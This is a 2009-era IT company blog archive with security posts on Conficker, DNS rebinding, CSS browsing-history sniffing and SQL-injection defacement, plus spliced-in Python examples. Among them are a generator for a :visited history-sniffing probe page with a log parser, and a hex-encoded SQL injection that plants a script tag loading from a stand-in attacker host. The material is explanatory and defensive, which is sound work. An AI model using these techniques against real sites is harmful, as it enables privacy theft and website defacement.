Is your computer infected with Conficker?

It's a nasty worm and it's done some damage… it even took out the Houston courts. So are you infected? It has had millions of infected machines at times and has slowed, but you can do a quick spot check. Look at the four images below… if you can see them it is unlikely that you have been infected. We know this because the worm blocks DNS lookups for a number of anti-virus vendor websites, so attempting to load their logos (or their sites, if you click through) tells you something: if they will not load, you may be infected. Two caveats: a logo your browser has already cached will still display on an infected machine, and a machine with no working DNS at all fails the check for an unrelated reason, so treat this as a spot check rather than a diagnosis and confirm with an up-to-date scanner.


Testing Conficker worm blocking F-Secure

You should see the F-Secure logo here. You can confirm by clicking on the image – if you get through to the F-Secure website, your computer is probably not infected with Conficker.


Testing Conficker blocking SecureWorks

You should see the SecureWorks logo here. You can confirm by clicking on the image – if you navigate to the SecureWorks website, your computer is probably not infected with Conficker.


Trend Micro is blocked by the Conficker worm

You should see the Trend Micro logo here. You can confirm by clicking on the image – if you get through to the Trend Micro website, your computer is probably not infected with Conficker.


You should see the F-Prot Antivirus logo here. You can confirm by clicking on the image – if you get through to the Frisk Software / F-Prot Antivirus website, your computer is probably not infected with Conficker.
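The same check done from the command line rather than with images, as an added Python example that is not part of the original post. It resolves the four vendor names alongside a couple of unrelated control names (an assumed choice; any names the worm has no reason to block will do), so that a machine with no DNS at all is reported as "no-dns" rather than as infected. The rule it encodes is the one the images rely on: the worm refuses to resolve security vendor names, so those failing while ordinary names succeed is the tell.

```python
import socket

# Security-vendor hosts the page tests with.  Conficker's block list matches
# on substrings such as "f-secure" and "trendmicro", so on an infected
# machine these lookups should all fail.  Extend to taste.
SECURITY_HOSTS = [
    "www.f-secure.com",
    "www.secureworks.com",
    "www.trendmicro.com",
    "www.f-prot.com",
]

# Hosts the worm has no reason to block (assumed choice).  If these fail too,
# the machine has no working DNS and the check says nothing about infection.
CONTROL_HOSTS = ["www.example.com", "www.iana.org"]


def live_resolve(name):
    """Return True when the OS resolver can turn name into an address."""
    try:
        socket.getaddrinfo(name, 80)
        return True
    except socket.gaierror:
        return False


def assess(resolve=live_resolve, security=SECURITY_HOSTS, control=CONTROL_HOSTS):
    """Classify the machine from which names resolve.

    Returns (verdict, failed_security_hosts); the verdict is one of
    'no-dns', 'suspicious', 'partial' or 'clean'.
    """
    if not any(resolve(h) for h in control):
        return "no-dns", list(security)      # cannot tell anything
    failed = [h for h in security if not resolve(h)]
    if len(failed) == len(security):
        return "suspicious", failed           # only vendor names fail: the tell
    if failed:
        return "partial", failed              # some fail: check those by hand
    return "clean", failed


def fake_resolver(reachable):
    """Resolver backed by a constructed set of resolvable names (for demos/tests)."""
    return lambda name: name in reachable


if __name__ == "__main__":
    verdict, failed = assess()
    print(verdict, failed)
```

Run it on the machine in question; "suspicious" means every vendor name failed while the control names resolved, which is exactly what the worm's DNS hook produces. Any other verdict is not a clean bill of health, only the absence of this one symptom.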

Anti DNS pinning (DNS rebinding) and your intranet

So, me being the crazy guy that I am, I spent about 15 hours watching DEFCON videos before I decided to write this and comment on how this attack is still a threat almost a decade after it was first discovered. Basically this is very old, but I just found out about it, so I'm sure many others haven't heard either and I want to bring it to the community's attention (again).

So what is it? How does it work? What are the risks? How can we protect ourselves?

Basically, with the power of modern browsers you can do almost anything from a web page. You can create web pages inside web pages (frames), make HTTP requests from inside a page (XMLHttpRequest), and even open raw sockets using everyone's favorite plugin (Flash). So what does this allow us to do? Well, build really cool web apps for one, but it also lets an attacker pull off a DNS rebinding attack. With nothing more than a domain, an attacker can read and manipulate web applications on your intranet, most of which keep you logged in, use pass-through (integrated Windows) authentication from the domain, or just don't have any authentication at all. That shouldn't be a problem, right? It's on an internal server with an internal address and we have a nice firewall. Wrong: with this attack the attacker reaches internal web apps (and anything else on the network worth poking at) by using the victim's browser as a proxy. To perform the attack we make the browser believe that the external web page and the internal one came from the same origin, which bypasses the same-origin policy that is meant to stop exactly this. So let's look at what happens.

A user requests foo.com and gets back an external address (and a web page). That page then waits for, or triggers, a second DNS resolution of foo.com, but this time the attacker's DNS server returns an internal IP. The external page came from foo.com, and the browser believes the internal page did too, and therein lies the problem: the same-origin policy is keyed on the host name, not on the address it resolved to. Now the attacker's page can talk to the internal page and do whatever it likes, such as:

load Flash and do a port scan from inside the network (working demo)

or reset your home router

or something else nasty, because now the attacker effectively has a VPN connection into the network, all without a user click, an OS exploit or any interaction at all: we simply sent you to our web page, or you loaded the JavaScript from our ad, and now we are in. This attack has been around forever and there is no single patch for it, because it abuses one of the root ideas of the internet: DNS. Browsers mitigate it with DNS pinning (keeping the first address for the life of the page), internal applications mitigate it by rejecting requests whose Host header is not a name they own, and resolvers can refuse to hand back private addresses for external names, but none of those is universal. We need to take a closer look at the infrastructure that runs the internet and at how we secure ourselves and our clients from such devastatingly simple attacks.

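The exchange above, with both the attacker's DNS server and the victim's browser modelled, plus the two defences that exist, as an added Python simulation that is not part of the original post. foo.com is the page's own example; the addresses 203.0.113.10 and 192.168.1.1 are assumed, and the model skips the details of how an attacker defeats browser pinning (the classic anti-pinning trick was to make the first address unreachable so the browser resolved the name again).

```python
import ipaddress

DOMAIN = "foo.com"
ATTACKER_IP = "203.0.113.10"   # assumed public address of the attacker's web server
INTERNAL_IP = "192.168.1.1"    # assumed address of the victim's home router


class RebindingResolver:
    """Attacker-controlled authoritative DNS for foo.com.

    The first answer is the attacker's own server so the page loads; every
    later answer points inside the victim's network.  TTL 0 invites the
    browser to ask again soon.
    """

    def __init__(self, public_ip, target_ip):
        self.public_ip = public_ip
        self.target_ip = target_ip
        self.queries = 0

    def answer(self, name):
        assert name == DOMAIN
        self.queries += 1
        return (self.public_ip if self.queries == 1 else self.target_ip), 0


def browser_session(resolver, pinned):
    """Load the attacker's page, then let its script request foo.com again.

    With DNS pinning the browser keeps the first address for the page's
    lifetime; without it the second lookup wins.  Either way the request
    carries Host: foo.com and the browser treats the reply as same-origin
    with the attacker's page.
    """
    first_ip, _ = resolver.answer(DOMAIN)
    second_ip = first_ip if pinned else resolver.answer(DOMAIN)[0]
    return {"connect_to": second_ip, "headers": {"Host": DOMAIN}}


def intranet_app(request, own_names=None):
    """The internal web app.  own_names=None models an app that serves any Host."""
    host = request["headers"].get("Host", "")
    if own_names is not None and host not in own_names:
        return 400, "unexpected Host header"
    return 200, "router admin page"


def resolver_drops(answer_ip):
    """A filtering resolver refuses private addresses for external names
    (what dnsmasq's --stop-dns-rebind option does)."""
    return ipaddress.ip_address(answer_ip).is_private


def simulate(pinned=False, host_check=True, resolver_filter=False):
    """Run one attack under the chosen defences and name the outcome."""
    request = browser_session(RebindingResolver(ATTACKER_IP, INTERNAL_IP), pinned)
    if request["connect_to"] != INTERNAL_IP:
        return "stayed on attacker host"
    if resolver_filter and resolver_drops(request["connect_to"]):
        return "blocked by resolver"
    own = {INTERNAL_IP, "router.local"} if host_check else None
    status, _ = intranet_app(request, own)
    return "compromised" if status == 200 else "blocked by Host check"
```

simulate(host_check=False) ends "compromised"; the default, where the intranet app insists on a Host header it actually owns, ends "blocked by Host check"; pinned=True keeps the browser on the attacker's host; resolver_filter=True shows a filtering resolver dropping the private answer. Host checking is the one defence the application owner controls, which is why it is the standard recommendation for anything listening on an internal address.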

I know I kinda glazed over some of the more technical aspects, but I think I got the overall point across and I'm sure Google could help you out if you wanted to know more. I'm also sure that you have comments / ways to mitigate this (or make it really, really hard) and I would like to hear those in this post's comments. I'm just starting to be able to understand some of these more advanced security issues and I think that we should be aware of them even if we haven't come up with a solid solution just yet.

Here are some more resources for reading:

http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html

http://ha.ckers.org/blog/20060908/dns-pinning-just-got-worse/

https://www.blackhat.com/presentations/bh-usa-07/Byrne/Presentation/bh-usa-07-byrne.pdf

thank you for your time

carter cole

never send a human to do a computer's job

Start Panic! and how it works

Start Panic Website

OK so what is Start Panic!

Basically all it does is enumerate your browsing history… but that's a lot. Everything we do now is online, and all the sites we use for everything from banking to social networking show up in that history. First I want to quickly cover why this information should be kept secret, and then explain exactly how they get to it.
On its own this is hardly a problem: aside from some embarrassing browsing history there isn't a lot you can do with a stolen history. Combined with the classics (social engineering, weak passwords and phishing), though, you could be in a lot of trouble. It happened to Twitter just recently and it can happen to you. People can guess security questions from what you post on social networking sites; "where did you first go to school" or "what's your pet's name" are no longer hard to find, and your browsing history tells them exactly where to look for your profiles. With some basic information on you and a crafty email, many would fall for a phishing scam, and from there they can get even more. 61% of people reuse the same password across sites (1), which means that if one of your online accounts is lost they are all in danger, especially if it's your webmail account: the attacker can simply have the other sites reset your passwords into the mailbox they now control. Yahoo has taken one of the first measures against this by having multiple security questions and the ability to reset your password with your cell phone, but many sites still don't offer this.
But enough with the scare tactics; let's look at exactly how this attack is conducted and how some simple functionality gave the attacker the keys to the kingdom.
CSS is the standard way to style content on the web and it's responsible for much of the explosion in design creativity, but it can also leak important information (such as your browsing history).
Consider this CSS:
<style>
a{
display:none;
}
a:visited {
display:block;
}
</style>
Now links will only display if they have been visited. The attacker writes a large number of links to common sites (Facebook, your bank, and so on) into the page, and it's a simple task for some JavaScript to check which of those links are displayed (getComputedStyle on each link tells it). That's it: they have your browsing history, and know what sites you use and where you bank online.
At the time of writing there is no real way to prevent this attack. It is even possible without JavaScript: the page uses a server-side script and has the :visited style request an image from the server, so each visited link announces itself in the server log, though that variant is uncommon and less reliable. Browsers have since restricted what :visited may change (only colors, with getComputedStyle reporting the unvisited values), which closes the basic form of this leak, but it is still worth clearing your history, because you don't know who's reading it as you pass by on the world wide web.
1) http://www.readwriteweb.com/archives/majority_use_same_password.php
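The no-JavaScript variant mentioned above, as an added Python example that is not part of the original post or of Start Panic! itself: the attacker's server emits one invisible link per target plus a :visited rule that sets a per-site background image, so a browser that has visited the site fetches the image and the access log records it. The target list, the beacon path /v and the log lines are constructed for the example. Current browsers no longer load resources from :visited rules, so this reproduces the 2009 behaviour, not a present-day one.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed target list (Start Panic! used a much longer one).
TARGETS = [
    "https://www.facebook.com/",
    "https://www.paypal.com/",
    "https://mail.google.com/",
]

BEACON_PATH = "/v"   # assumed path on the attacker's server that just logs hits


def probe_html(targets):
    """One invisible link per target; the ids tie each link to its CSS rule."""
    return "".join(
        f'<a id="p{i}" href="{url}">&nbsp;</a>' for i, url in enumerate(targets)
    )


def probe_css(targets, beacon=BEACON_PATH):
    """Only a visited link gets a background image, so only visited sites
    cause a request to the beacon: history sniffing with no JavaScript."""
    rules = [
        f"#p{i}:visited {{ background: url({beacon}?site={quote(url, safe='')}); }}"
        for i, url in enumerate(targets)
    ]
    return "a { color: inherit; }\n" + "\n".join(rules)


REQUEST_LINE = re.compile(r'"GET (\S+) HTTP/')


def visited_from_log(log_lines, beacon=BEACON_PATH):
    """Recover the visited sites from the attacker's web server access log."""
    visited = set()
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != beacon:
            continue
        visited.update(parse_qs(url.query).get("site", []))
    return visited


# Constructed access-log lines: the victim's browser fetched two beacons,
# which means two of the three targets were in its history.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/May/2009:10:12:01 +0000] "GET /probe.html HTTP/1.1" 200 1843',
    '198.51.100.7 - - [20/May/2009:10:12:01 +0000] "GET /probe.css HTTP/1.1" 200 412',
    '198.51.100.7 - - [20/May/2009:10:12:02 +0000] "GET /v?site=https%3A%2F%2Fwww.facebook.com%2F HTTP/1.1" 200 43',
    '198.51.100.7 - - [20/May/2009:10:12:02 +0000] "GET /v?site=https%3A%2F%2Fwww.paypal.com%2F HTTP/1.1" 200 43',
]
```

The JavaScript version on the page is faster and needs no server log, but this one works with scripting disabled, which is why "turn off JavaScript" was never a complete answer.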

New search technology (a Google Lovefest)

Google is the big dog of the internet world and I wanted to give a quick update on some of the new technology they have been adding to search over the past few months: color search in images, more options for our searches and better ways to get our content indexed. Google definitely has the end user in mind and is providing great tools to make our searches easier and our lives better.

The first new thing I want to mention is Google's ability to search for images by color. Image search now has an option to choose what colors you want your results to mostly contain. I have a few ideas for using it to generate very complete image libraries for image mosaic programs such as AndreaMosaic (free, http://www.andreaplanet.com/andreamosaic/), but it's mostly just a lot of fun to play with. You can read more here: http://googleblog.blogspot.com/2009/04/search-rainbow.html

More recently Google has done it again, adding even more options to search queries. The ability to search only forums, find reviews and look at only recent results is now available in the Search Options panel. Find out more at http://www.dullest.com/blog/google-searchology-2009-search-options-google-squared-rich-snippets/

And to finish this Google lovefest off, a couple of things they have implemented to help the ever-important web developers keep your site indexed correctly and showing the relevant data that drives traffic to your business. First is the canonical URL, which improves indexing by providing a way to identify duplicate pages on your site. With everything dynamic nowadays and Web 2.0 in full swing, the same page may look very different depending on where you came from. Before, those duplicate pages would add noise to the index, but now there is an easy way to specify that one page is the same as another: the canonical URL (a link element with rel="canonical" in the page head). Now all your precious link juice and the other information Google finds on the page can be connected instead of being spread across many different permutations of a page.

Read more about the canonical URL here: http://googlewebmastercentral.blogspot.com/2009/02/specify-your-canonical.html

Finally, the newest of the new is the idea of inline markup to describe common objects so they can be easily parsed and searched. "Rich Snippets" let developers embed structured information about the text on the page, in a parseable format (microformats or RDFa), for reviews, people or companies. This extra metadata lets Google show even more relevant information about your pages and further helps drive traffic to your site. Get the latest on microformats from Google themselves, and also at http://searchengineland.com/google-search-now-supports-microformats-and-adds-rich-snippets-to-search-results-19055

SQL injection attacks, Website Defacements and How to protect your ASP

Website defacements are never good: they look bad for the website and for the developer. But how are they done? Although SQL injection can have much worse ramifications than a defacement, let's look at how a simple defacement occurs and how we can protect our applications from this form of attack.

Defacements are often carried out by attackers' bots looking for vulnerabilities in scripts, performing an automated attack on sites that meet some initial criteria. When a bot finds a page that could be vulnerable to SQL injection it sends requests with every user-controlled input filled with a specially crafted SQL statement, trying to seed the website's database with their malicious JavaScript.

The following URL contains a real SQL injection query that had been encoded in hex so special characters could be passed in the query string. It does one thing: terminate the current query and attempt to deface the website.

The real world SQL injection query was found on
http://www.diegolewis.com/blog/?p=26

This little query (from the URL above) appends an HTML script tag to every row in every column of every table that could hold text which might be written to a page of the site. The result is that the database fills with the malicious script tag and eventually it gets written out to a page.

The malicious JavaScript can do anything, but often draws a layer over the original website with a message claiming credit for the defacement. Once a website has been defaced it is often submitted to http://www.zone-h.org/, a popular website for tracking defacements. A small hole in your code has brought your site down temporarily and damaged your reputation with any customers who visited during the attack.

So how can we protect our websites from this type of attack? First and foremost by using parameterized queries everywhere user input reaches the database, so that the input is bound as a value and can never be parsed as SQL. Validating user input (types, lengths, allowed characters) and filtering obvious SQL fragments add a second layer, but filtering alone is not enough, because encodings like the hex CAST above exist precisely to slip past such filters. It also helps to run the application under a database login that only has the rights it needs; a bot that can only SELECT and INSERT into a couple of tables cannot rewrite every text column in the database. Here are some other people who have tackled this subject and come up with useful information.

Nazim’s IIS Security Blog – Filtering SQL injection from Classic ASP

http://blogs.iis.net/nazim/archive/2008/04/28/filtering-sql-injection-from-classic-asp.aspx

The 4 Guys Article on SQL injection

http://www.4guysfromrolla.com/webtech/061902-1.shtml

Microsoft’s pointers on protecting yourself from a SQL attack

http://msdn.microsoft.com/en-us/library/ms998271.aspx
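Both halves of the story above in one added Python example that is not from the original post: decoding a hex-wrapped payload of the shape described (the request string and the statement inside it are constructed for the example, not the real one from the linked blog), and the vulnerable classic-ASP-style concatenation beside the parameterized query that defeats it. SQLite stands in for SQL Server; executescript() plays the role of a driver that accepts statement batches, which is what made the stacked UPDATE possible in the first place.

```python
import re
import sqlite3
from urllib.parse import unquote

SCRIPT_TAG = '<script src="http://attacker.invalid/d.js"></script>'

# 1. A constructed request of the shape described above (not the real one):
#    the UPDATE is hidden in CAST(0x... AS VARCHAR) so no quote or angle
#    bracket appears literally in the query string.  The real worm walked
#    sysobjects/syscolumns with a cursor to reach every text column.
INNER_TSQL = "UPDATE posts SET body=body+'" + SCRIPT_TAG + "'"
SAMPLE_QUERY_STRING = (
    "p=26;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + INNER_TSQL.encode("ascii").hex()
    + "%20AS%20VARCHAR(4000));EXEC(@S);--"
)

HEX_CAST = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)", re.I
)


def decode_hex_casts(query_string):
    """Return the plaintext hidden in each CAST(0x.. AS VARCHAR(n)) of a raw query string."""
    text = unquote(query_string)
    return [bytes.fromhex(m.group(1)).decode("latin-1") for m in HEX_CAST.finditer(text)]


def looks_like_defacement(query_string):
    """Flag requests whose decoded payload writes a script tag into the database."""
    return any(
        "update" in sql.lower() and "<script" in sql.lower()
        for sql in decode_hex_casts(query_string)
    )


# 2. The vulnerable lookup beside the parameterized one.  SQLite concatenates
#    strings with || where T-SQL uses +, hence the different payload text.
INJECTED_ID = "26; UPDATE posts SET body = body || '" + SCRIPT_TAG + "'"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE posts(id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO posts VALUES (26, 'Hello', 'first post');"
    )
    return conn


def vulnerable_lookup(conn, raw_id):
    """Classic ASP habit: concatenate the input into the SQL and hand the
    string to a driver that runs statement batches (executescript() plays
    that driver here), so the attacker's UPDATE runs right after the SELECT."""
    conn.executescript("SELECT title FROM posts WHERE id = " + raw_id)


def safe_lookup(conn, raw_id):
    """Parameterized: the input is bound as a value and never parsed as SQL."""
    return conn.execute("SELECT title FROM posts WHERE id = ?", (raw_id,)).fetchone()


def stored_body(conn, post_id=26):
    """What the site would render for the post: defaced or not."""
    return conn.execute("SELECT body FROM posts WHERE id = ?", (post_id,)).fetchone()[0]
```

Running looks_like_defacement() over the query strings in a web log finds the attempts; the fix is safe_lookup(), where the same injected input bound as a parameter simply matches nothing and the body column is untouched. The third line of defence is a database login for the site that cannot UPDATE tables it has no business changing.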

Data Backup Nightmares

Who has had problems with reliably backing up the data on their computer networks? All businesses have had this problem, and you usually do not find out about it until it is too late; in other words, you lost that data or it has become corrupt. The pain of managing a backup is an issue too: changing tapes or hard drives on a daily basis is something so easily forgotten, and they seldom go offsite like they need to. IS Support has developed a product called IS RapidRestore. The product has the following features:

• Backups of data every 15 minutes, with these backups retained for up to a year

• Offsite backup of the full data every night

• Virtual capabilities that can restore business operations in less than 1 hour

• Monitored 24/7 by a professional and knowledgeable staff.

RapidRestore replaces all of your backup setups used today. No more need to upgrade to the latest backup software. No more need to manage a tape rotation and offsite process. This product gives you great peace of mind that your data is backed up and very easy to restore. For more information, check out this link: www.issupport.com/ISRR.asp, contact sales@issupport.com or call 713-861-7870.

A worm to the botnet?

Over the past few weeks, we've been hearing about worms, botnets and worldwide virus outbreaks (the computer kind, not Pig Flu). What exactly does a worm or botnet do? How can we be protected from these infections? Can these ever be completely stopped? Will my computer ever get a virus?

A virus is basically any piece of software written to spread across multiple computers, mostly without any user interaction, that sometimes damages or steals user data. Computer viruses are usually broken down as: worms, which spread between computers using security holes; trojans, which look like an innocent piece of software to the user; and rootkits, programs that hide themselves to prevent detection and usually spread other malware. I personally consider spyware and adware to be viruses since they interfere with a person's computing experience and serve no purpose other than to trick people into buying or clicking something.

Sometimes the virus itself isn't the issue; the virus is only a vehicle to deliver another piece of software. These secondary infections might be other malware, spyware/adware, or botnet clients. The botnet client is an interesting tool that can be used for good, but unfortunately it is usually used for evil. This piece of software allows many computers (millions) to be controlled from multiple places in the world and made to do whatever the botnet operator wants. Most commonly these botnets are used to send spam email and attack specific websites. Imagine if you had 400,000 computers around the world sending 10,000 spam messages EACH per day! This is one reason why spam is difficult to nail down. Now imagine you have those same computers all requesting pages from the same website, at the same time, at a rate of 10 requests per second. This would bring any website to a crawl and even make it appear completely offline! And the worst part is: you might never know you're infected, and with the use of rootkits your virus scanner might never find it!

So now that you're completely freaked out and about to pull the power cable from your computer, let me explain what can be done. Like any biological organism with an immune system, the best way to fight infection is to prevent it from entering your computer. This means frequent updates to your operating system and other applications. All major operating systems (Windows, MacOS, Linux) and many software vendors (Sun, Adobe, Google, Mozilla) have a mechanism to notify you of, and/or mass deploy, security and usability updates. Use it! Whenever it reports a security patch is available, install it as soon as you have made a backup of your system (updates fail and can cause serious heartache). The second step is antimalware software. This is the immune system of your computer: if something breaks through or takes advantage of an unpatched system, the antivirus might be able to catch the infection before it spreads too far. However, antimalware applications must be updated at least daily, if not three times a day; virus writers are driven by ego, money and boredom, so they can crank out new infections rather quickly. Third, make sure your computer is behind a firewall. This device prevents direct attacks and hides your computer from infected computers scanning for their next host. Lastly, do not open emails that look suspect or click on ads that pop up. All mainstream web browsers have a popup blocker built in, but that doesn't stop them all, and sometimes just clicking an ad will install something in the background and cause more popups or other infections.

Chances are, you’ve had a virus and you’ll get another. This is part of our online world. Keep everything updated, schedule regular virus scans and pay attention to what you click. Infections will probably never go away. As long as there is any system in place, there will be those that want to hack it and see what they can get away with; most of the time, for the sheer joy of doing it. All we can do is hope for the best, prepare for the worst and expect the unexpected.

Now go get patched!

G’night!

Steve Domingo

IS Support, Inc.

sdomingo <at> issupport.com

www.issupport.com

 

Additional reading but not endorsements

Conficker begins to awaken: http://bit.ly/uxhMD

MacOS botnet: http://bit.ly/aMBKy

Malwarebytes.org

Windows Defender

Eset NOD32

ClamAV

 

 

Exchange 2010

WOW!  The beta of Exchange Server 2010 is already here.  It seems like 2007 just hit the market, and now we are already hearing about the next version.   We have just started implementing 2007 in the last 9 months and most of our consultants are familiar with it now.  We are finding it to be a far better product than Exchange 2003. 

The problem that I have with this release is that IS Support has found that only a minority of our clients have an interest in upgrading to 2007. My current opinion is that most clients will not upgrade to 2007, and will rather skip directly to 2010, especially with the current economic situation.

It will be interesting to watch how our clients handle Exchange 2007 and 2010, which is one year away or thereabouts from release.

Please let me know your thoughts.

 

Steve Combs

713-861-7870

Scombs<at>issupport.com

www.issupport.com

Internet worms and Cybercriminals

Today on the front page of USA Today there is an article titled Cracking the Code. This article discusses the use of cheap labor to enter CAPTCHAs to create fake Facebook and other social networking accounts. What the heck is a CAPTCHA? They are the distorted letters and characters that you must enter when you are creating an account on a social networking site and many other websites. Here is the article:

http://www.usatoday.com/tech/news/computersecurity/2009-04-22-captcha-code-breakers_N.htm

The whole goal of these cybercriminals is to start spamming within the social networking sites, just like email. The concern is that social networking will go the way of email: 90% of email today is spam.

Steve Combs

scomb<at>issupport.com

www.issupport.com

IS Support, Inc

IS Support is an IT solution provider in Texas. This blog was created to provide the general small business community in Texas with a tool to keep track of the numerous changes that are occurring on a daily, weekly and monthly basis. The posts will focus on the latest technology news that will affect small and medium sized businesses. Please watch this site for weekly updates going forward.

Please subscribe to get email updates when a new posting comes out.

Steve Combs

IS Support, Inc

www.issupport.com

scombs<at>issupport.com